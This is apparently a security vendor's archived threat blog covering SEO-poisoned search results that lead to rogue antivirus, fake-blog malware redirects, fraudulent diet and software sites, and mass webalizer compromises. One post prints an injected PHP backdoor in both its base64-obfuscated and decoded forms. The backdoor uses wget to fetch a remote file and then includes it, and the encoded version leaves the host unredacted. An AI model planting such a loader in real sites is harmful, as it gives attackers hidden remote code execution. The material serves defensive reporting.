Google Users Targeted By New Malicious Websites

eSoft’s Threat Prevention Team has been tracking compromised sites that host PageRank Bombs since 2008.  The attacker hacks a site, but instead of putting exploits on the hacked site, they put links to other websites in order to boost the search result ranking on various search engines.  Initially this was being used for ad sites, porn sites, and pharmafraud sites.  Now, however, it is being used to boost the results of malicious sites, but with a new twist that targets Google users.

The sites whose search engine ranking is being boosted are now serving up malware through a complex series of redirects.  However, the redirects and the malware are only served up if the user gets to the site after clicking the link on Google.  Going directly to the malicious site (by pasting into your browser directly) results in a harmless page.

For example, using Google, a search for “nhl all-time scoring leaders” returns several malicious results on the first page (in the 5th, 6th, 7th, 8th and 10th positions). 

Going to the website, hxxp://adoptabeach.org/zzbtw/colzw/leaders.php, directly results in an innocuous page like this:

[Note: during research by eSoft, this page did not return malicious content when directly viewed, but extreme caution should still be taken before visiting any websites listed in this post.]

However, clicking the link in the Google search results will bring the user to a web site using a common Rogue Anti-Virus template that alerts the user that their PC is infected and prompts unsuspecting users to download what is really a Trojan:

The Trojan being downloaded at this point has only a 7% detection rate by anti-virus software with Microsoft, NOD32 and Panda detecting.

Some of the sites being used include:
hxxp://shanthkherath.com
hxxp://adoptabeach.org
hxxp://advertising-made-easy.com

These redirect through some URLs including:
hxxp://skystats1.net/in.cgi?9
hxxp://skystats1.net/redirect2/
http://jeremy-kyle-now.cn/go.php?id=2004&key=ff0057594&p=1

As far as eSoft’s TPT can tell, the referrer must have this string, google.com/search?q=, in it  and the User-Agent must indicate a Windows machine or the malware will not be delivered.  It does not appear that users of other search engines or operating systems are yet being targeted.

Fake Blogs Serve Rogue Malware

eSoft’s Threat Prevention Team has uncovered a massive amount of recently exploited websites, all redirecting to Rogue AV malware.

At the time of writing, Google shows over 720,000 compromised URLs.  According to VirusTotal [http://www.virustotal.com/analisis/23c06523d4b5cf2c9e853bb5e7a20916e5246e81a17a39b9aad3f2f86056defd-1252440943], only two of forty-one anti-virus companies are currently detecting the malware. 

Credit also goes to Edgar (http://edetools.blogspot.com) who independently discovered and blogged about this same threat.

The compromised sites frequently contain fake blogs on the topics of entertainment and celebrities such as Britney Spears (see screenshot).

hxxp://aljassmy.com/music/html/bmblog/britney-spears-chocho-a-lo-locco/.

Upon visiting the site, an obfuscated javascript file redirects the visitor to the one of several sites that host the malware payload.  Multiple redirect domains are being used to further obfuscate the final destination and all of these are currently flagged as malicious by eSoft (most have been set to malicious for over a week).

Unprotected users will see a pop up window that performs a fake system scan. The user is then notified that they are infected with several threats and prompts to download the supposed cure, which is in fact the malware.  This scheme is all too common and eSoft’s Threat Prevention Team has been detecting a dramatic increase in this scam through August.  This latest appears to be the most widespread to date. 

The malware payloads change often and anti-virus detection is lagging behind.  eSoft recommends multiple layers of anti-virus at the desktop and gateway in combination with secure web filtering. A secure web filter protects users by blocking the malware distribution points even as the malware changes to evade anti-virus detection.

Chinese Scams Resurface with New Branding

The Threat Prevention Team has found thousands of URLs and over 200 new domains registered to a group of Chinese scammers. The new sites are the same as the old, but with new branding and promotional products, such as "Acai Power Slim" "Pure Magnum Pro" and "Colo Cleanse Plus". This scam is perpetrated by sending spam messages advertising a "free trial" of the products. In the end, the criminals have made off with personal information, a credit card number and a recurring monthly charge.

Here is an example of an “Acai Power Slim” site. The pages are filled with bogus testimonials, citations from CBS and ABC News and clinical research. Also note the pressure to sign up for the "risk free trial."

As you dig through the site, you'll notice any meaningful way to contact the site owners has been removed. An email form is present which presumably will never be answered. All of the domains found match the previous pattern and have been registered to Chinese ownership.

DomainName : appleaboard.com

Creation Date ..................2009-08-19
Last Update Date ...............2009-08-24

Registrant Name .................FANG JUN
Registrant Organization .........FANG JUN
Registrant Address ..............JIANGYANGBERILI13
Registrant City..................YY
Registrant Province/State .......HN
Registrant Country Code .........CN
Registrant Postal Code ..........414039
Registrant Phone Number .........+86.073051421473
Registrant Fax ..................+86.073051421473
Registrant Email ................hiuaxiang@163.com

Expect to see an increase in spam associated with these domains over the next several weeks as the scammers attempt to lure people to these sites. eSoft is detecting these sites as "Phishing & Fraud."

Here is a sample list of the recently registered domains:

• appleaboard.com
• easyalong.com
• fasterdevelop.com
• pureacaisolution.com
• sunnyact.com

More information on this scam is available on Wikipedia http://spamtrackers.eu/wiki/index.php/Acai_Power_Slim

New Rash of Fraud Sites Touting Cheap Software

eSoft is researching a widespread and dangerous ring of fraudulent "OEM Software" distribution sites. These sites offer popular software from Microsoft, Adobe, and many other vendors at a greatly reduced price. Not only do they not deliver installable software, they collect sensitive information from individuals, including credit card numbers.

eSoft has identified over 11,000 of these web pages so far.

While these sites may look real, touting Microsoft and Verisign certifications, they are far from legitimate. Many of these sites come back as top results in Google and Yahoo searches. Alarmingly, many URL filters are NOT able to detect and block these sites.

Here is just one example of the many sites currently up and running. 

The company name given on many of these fraudulent sites is "OEM Downloads Inc", “Authorized Software Reseller” or “Download Software”. You can check for this at the bottom of the page where there is often a copyright notice. Throughout the sites there are tell-tale signs that this is a shady website that should not be trusted.

Straight from their FAQ..."you will not receive any printed documentation (licensing or instructions) - just files and instructions in .txt format, and will not be able to register this software online." This was the company's explanation for the low prices they are able to offer. If you are not able to register the product, it is not a real copy or you won’t be getting it in the first place.

Another sign is that they are offering Adobe Creative Suite software on the site. Adobe does not distribute or allow OEM distribution of their software. In fact, OEM software is rarely sold outside of a hardware bundle, like a new computer system.

Unsurprisingly, the whois information shows Russian ownership for most of these domains. For example:

------------------------------

WHOIS – COMPUTERCODEPLANET.COM

   Domain Name: COMPUTERCODEPLANET.COM
   Registrar: ONLINENIC, INC.
   Whois Server: whois.onlinenic.com
   Referral URL: http://www.OnlineNIC.com
   Name Server: NS1.ENCATGPC.COM
   Name Server: NS2.ENCATGPC.COM
   Status: ok
   Updated Date: 20-jul-2009
   Creation Date: 06-jan-2009
   Expiration Date: 06-jan-2010

Registrant:
         Valery Rigalo vrigalo77@inbox.ru +7.4999384712
         N/A
         Novomariinskaya str., 11/1, apt. 38
         Moscow,N/A,RU 193901


Domain Name:computercodeplanet.com
Record last updated at 2009-01-06 12:08:08
Record created on 2009/1/6
Record expired on 2010/1/6


Domain servers in listed order:
         ns1.encatgpc.com        ns2.encatgpc.com

------------------------------

The Threat Prevention Team has also noticed many compromised sites including some government and educational sites, are linking back to these domains. This further substantiates the criminal intentions of these fraudsters. eSoft is flagging these URLs as “Phishing & Fraud.”

Mass Compromise of Sites with Webalizer

The eSoft Threat Prevention Team has been tracking a rapidly growing pattern in website exploits over the last 24 hours. Since Thursday, Aug 20 eSoft has seen over 6,000 compromised URLs of the pattern:

http://www.example.com/webalizer/050709wareza/crack=28=keygen=serial.html

And the numbers are growing at a rate of several hundred per hour. A google search for inurl:050609wareza shows around 30,000 such compromised sites.

The compromised sites typically have nonsense text and a series of pictures of pills with links to more compromised sites and dangerous scripts that trigger well known exploits including the recent exploit of the ActiveX streaming video control, discussed in this eSoft security bulletin:

http://www.esoft.com/alerts/cve-2008-0015.cfm.


In some cases, such as when eSoft researchers tried navigating to a compromised site using Firefox on Windows, a redirection to files express occurs:


In testing, when the exploit is successful, it seems to be an information stealing Trojan, though the payload has varied. As the payloads seem to have weak coverage by AV companies and seem to be changing frequently, blocking the offending websites is the best solution for preventing infection.

eSoft’s threat prevention team notes that around 1/3 of the compromised sites include a webalizer directory, which may indicate a correlation with a recently published webalizer exploit. This exploit allows an attacker to execute arbitrary code, often with elevated privileges. More information on this exploit can be located below. It is recommended that administrators configure webalizer to not do reverse DNS lookups until a patch is released.

http://linuxdevcenter.com/pub/a/linux/2002/04/16/insecurities.html

eSoft will continue to cover this threat and continue to protect customers from these websites by flagging them as Compromised. At the start of research, Google had very few of these sites flagged as malicious, but it seems that increasing numbers are being identified by their cloud security as well. Other security engines tested including Web of Trust, Norman, and Mcafee SiteAdvisor have very poor detection of these sites at this time.

Have you heard the one about the independent testing lab?

They always independently verify that their client is the best.

Independent tests these days are a joke.

In the last week, two different reports from December 2008 came to my attention: one from Cascadia Labs commissioned by Trend Micro and the other from Tolly Group commissioned by Websense. They both have sections on the effectiveness of the major web filtering companies in blocking malicious websites.

Of these two reports, the Cascadia Labs report was slightly more fair ranking Trend Micro as able to block 53% of web threats (the highest -- presumably with Anti-Virus enabled as well as URL filtering) followed by McAfee (42%), Blue Coat (31%), Websense (23%) and IronPort (20%). I'm ignoring the SurfControl entry (9%) because since Websense bought SurfControl, the product is essentially defunct and SurfControl partners are being urged to change to Websense.

The Tolly Group report said, "In tests with 379 URLs containing binary exploits or compromise code, Websense blocked 99% of URLs, versus other vendors who blocked between 53% to 91%." Lets look just at the results for Websense versus Trend Micro in terms of exploit detection in the two tests:

Report	Trend Micro	Websense
Tolly	53%	99%
Cascadia	53%	23%

Well, Trend Micro is consistent, but depending on who you ask, Websense is either twice as good or half as good. But here's the kicker, the Tolly report says, "All the URLs tested were mined from Websense ThreatSeeker network." So what they're saying is that Websense is very good (but not perfect) at detecting exploits on URLs it knows to have exploits.

Now here's the bottom line. A lot of folks make claims about security, but its a hard thing to verify. eSoft, the sponsor of this blog, for example, detected 35k new malicious URLs last week and has over 1.5m recently verified malicious URLs in its database at the moment. The combined lists of Google, Trend Micro, Sunbelt, PayPal, Mozilla, AOL, and Consumer Reports on the other hand have only 318k [source: stopbadware.org]. But these might be 318k not covered in the eSoft list, so the question becomes: how do you test these types of products?

I have some thoughts on how truly independent testing could be done including the collection and verification of malicious URLs without relying on a particular list that some vendor may already include directly, but I want to put it out there. What testing methodology should be used in a fair comparison of the ability of different products to block access to compromised, phishing, and otherwise malicious websites? And should the tests include things like malware call-home addresses? If so where does the source of URLs come from? And what is a fair sample size? What is a fair timeframe from first detection? Any feedback would be appreciated.

Return of the ThreatCenter blog

We've been dormant for awhile, but its time to bring back the ThreatCenter blog. eSoft's work in the web security area (identification of malicious/ compromised websites, not securing of web servers) has produced amazing results and huge volumes and its time to share some of these results back to the greater community.

We recently shared some data on a few days worth of fraudulent pharmacy sites with Richart Stiennon who published the information on his ThreatChaos blog (if you haven't read the article, please check it out -- and digg it while you're there). eSoft is seeing these sites at an increasing rate that is fairly staggering.

In our next post, we'll show some of the uglier examples of what we call "pagerank bombs" -- compromised sites used to host hidden links rather than malware.

Compromised Sites Boost PageRank for Porn

A recent analysis of a compromised web site by eSoft's Threat Prevention Team lead to the discovery of hidden links designed only to show up when viewed by web crawlers such as those used by Google, Microsoft and Yahoo.

The website reviewed, dancescape.tv, appears perfectly normal when viewed from standard browsers, but some PHP code has been injected that gives a long series of links designed to bump the PageRank of certain sites when viewed by a crawler.

The PHP code in question looks like this:


eval(base64_decode("aWYgKChlcmVnaSgiYm90IiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSBvciBlcmVnaSgidXJwIiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSBvciBlcmVnaSgibXNuIiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSkpIHsgc3lzdGVtKCJ3Z2V0IC1PIC90bXAvZ2V0aW5jbC50eHQgaHR0cDovL3B1YmxpY3NudWRlLmNvbS90ZW1wL2luY2wudHh0Iik7aW5jbHVkZSgiL3RtcC9nZXRpbmNsLnR4dCIpOyB9"));


And resolves to this:


if ((eregi("bot", $_SERVER["HTTP_USER_AGENT"]) or eregi("urp", $_SERVER["HTTP_USER_AGENT"]) or eregi("msn", $_SERVER["HTTP_USER_AGENT"]))) {
system("wget -O /tmp/getincl.txt http://[redacted].com/temp/incl.txt");
include("/tmp/getincl.txt");
}


When viewing the page with a user agent of googlebot, you get a lot of links that weren't there before. Here's a screenshot of one of the less offensive examples:

In other instances, a ton of porn links and text are displayed instead of the pharmaceutical links shown here.

This just proves the trends from open compromise to secret compromise. Most malware already tries to hide itself; web site defacements seem also to be a thing of the past as compromised sites are used more and more for relaying attacks and for more stealthy, income earning purposes.

Malware scanning for different gateways

Recently eSoft's Threatlabs found an increase in malware using uPnP - SSDP protocols to find new gateways out of a network. It appears that the effectiveness and increased use of IPS have impacted bot maintainers. Their answer - find another gateway. They are now sending uPnP packets to discover different gateways on their local network. If you are an IT manager, be sure to know where all the exits on your network live.

Microsoft out-of-band release

It's been a long time since our last post, but this weeks activity warrants a post. Yesterday, Microsoft announced a critical update (MS08-067), which occurred out of their normal "Patch Tuesday" cycle. Well it turns out that it was a good idea. The patch closes a security hole in how Windows systems communicate with each other. This vulnerability has the potential to be exploited through worm and spread wildly. It is advised that all users update with Windows systems as soon as possible.